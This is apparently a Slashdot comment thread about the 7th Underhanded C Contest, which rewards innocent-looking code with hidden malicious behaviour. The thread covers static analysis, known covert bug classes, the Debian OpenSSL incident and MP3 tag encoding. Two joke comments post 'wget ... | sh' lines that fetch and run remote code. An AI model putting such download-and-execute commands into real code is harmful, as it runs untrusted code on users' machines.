The 7th Underhanded C Contest Is Online 41
Xcott Craver writes The 7th Underhanded C Contest is now open. The goal of the contest is to write code that is as readable, clear, innocent and straightforward as possible, and yet somehow exhibits evil behavior that cannot be seen even when staring at the source code. The winners from 2013 are also online, and their clever and insightful submissions make for fun reading.
New twist this time (Score:5, Funny)
Previously the contest has been about doing nefarious stuff to the user of the program while keeping the code innocuous.
This time, they want you to clandestinely warn users of government spying. It's a complete about-face on the definition of "underhanded". I love it.
Re:New twist this time (Score:4, Funny)
Re: (Score:3, Informative)
If you read the whole thing you'd notice that you're playing the role of an NSA insider who's leaking information... I thought you people liked that sort of thing?
Re:New twist this time (Score:5, Insightful)
Re:The previous entry page leads to 404 (Score:5, Funny)
That's not a defunct link to previous entries, but a defunct link to a previous version of the contest site. I've un-defuncteded it to more recent previous version of the contest site, but soon that will also be defunctitated or defunctified, or defunctored.
You can see the previous entries by scrolling down, or by selecting "past years" from the menu bar on the web page.
Re:The previous entry page leads to 404 (Score:5, Funny)
What defunct are you talking about? ;-)
Re: (Score:3)
We want the funct!
Give up the funct!
We need the funct!
We gotta have that funct!
Owww! Stop the hitting...
Re:The previous entry page leads to 404 (Score:5, Funny)
I've un-defuncteded
So it's totally funct now?
Re: (Score:1)
Yes, and I'm very gruntled.
Not so clever (Score:3, Informative)
Don't get me wrong this is all great fun yet many of these schemes stand no chance of being committed in any serious project.
Implicit returns generate compiler warnings.
printf variable as format specifier is a well known security issue lazy eyeballs and static analysis tools check for.
Serialization delimiter games are also well known issues standing little chance of being accepted.
Not so clever (Score:4, Insightful)
Re: (Score:2)
CVE is a thing because static analysis tools are too chatty about too many things that have no chance of causing failure given your particular architecture or other system characteristics, but need to be examined/handled nevertheless. Tie that in with often subpar tools with subpar UI's and/or configurability and/or management that worries more about new features than code hygiene, and you will be saddled with CVE's because the tools wont be used, no matter how many issues they might find.
Re:Not so clever (Score:4, Funny)
Yeah right.
Something like this http://www.gergely.risko.hu/de... [risko.hu] would never get committed.
Re: (Score:1)
To be fair, the macro Debian removed was causing all sorts of warnings from one of them thar "analysis tools" for using uninitialized memory.
Re: (Score:2)
Or in our knowledge. Some entries are based on the fact that the compiler doesn't know what the program is supposed to do, and the person looking at it may not know all the subtleties of the language's syntax. The compiler sees perfectly innocent code, but the code doesn't do what the person reading it thinks it does.
It would be nice if the scoring criteria were better defined, e.g. "this bug will be det
My entry (Score:2)
exec("wget -O- http: //127.0.0.1/cute-puppies-and-unicorns-trust-me | sh");
Re: (Score:3)
For best results, use FTP! Comes with free side effects.*
exec("wget -O- ftp: //127.0.0.1/cute-puppies-and-unicorns-trust-me | sh");
(*FTP offer is nontransferable and must be presented at time of online download or Promo Code must be entered at 127.0.0.1 to receive discount. Underhanded discounts applied prior to percent-off total download discounts. Offer cannot be used in conjunction with any other percent-off discounts, including version-specific discounts. Offer not valid on the following merchandise: OpenBSD CD purchases; wget Cares® cause merchandise or other charitable
OpenSSL (Score:5, Funny)
Sorry guys but this year's winner hands down is OpenSSL.
Re:OpenSSL (Score:5, Funny)
Sorry guys but this year's winner hands down is OpenSSL.
No, underhanded C submissions have to be readable, clear and straightforward. OpenSSL is none of those.
Re: (Score:1)
That was fast! (Score:2)
Re: (Score:1)
Do what Amarok 1.4 does to MP3 tags. (Score:2)
Re: (Score:1)
I transcoded some FLACs to mp3s the other day using mp3fs (aside: which is actually really cool, it's a fuse filesystem that you point to somewhere containing flacs, and when you browse the mount point all the .flac files show up as .mp3 and you can just copy the mp3 files out). The FLAC tags are readable in Windows (both winamp and QuodLibet) and Linux. The mp3 tags are readable in Windows (winamp, QuodLibet and File Explorer's tracklist view) and Linux. All of the tags are gibberish on my car's in-dash
BeOS used to do that with CDs (Score:2)
They added a feature to the filesystem that let you insert a music CD and see the tracks as WAV files, so you could rip the CD simply by dragging them to your desktop.
I remember that because I tried to play a CD by selecting all the tracks in the folder and double-clicking, only to hear the OS play all the CD tracks at the same time.
Re: (Score:2)
It might be rendering the tags in UTF-16, which for code points \x00 - \x7F look just like ASCII with a NULL byte \x00 before (Big Endian) or after (Little Endian) each printable character.
Can you give an example? I'll take a look. Run Unix "strings" on the file, run it through "hd" and post it as a reply here.
$ strings file.mp3 | grep "known text" | hd
needed for comparison: UJC (Score:1)
Most of the entries in past years have relied on subtle use of unsafe code (buffer overruns, platform-dependent quirks, etc.) for which there are plenty of opportunities in C. I'd really like to see them run, in parallel with the same challenge, an Underhanded Java Contest.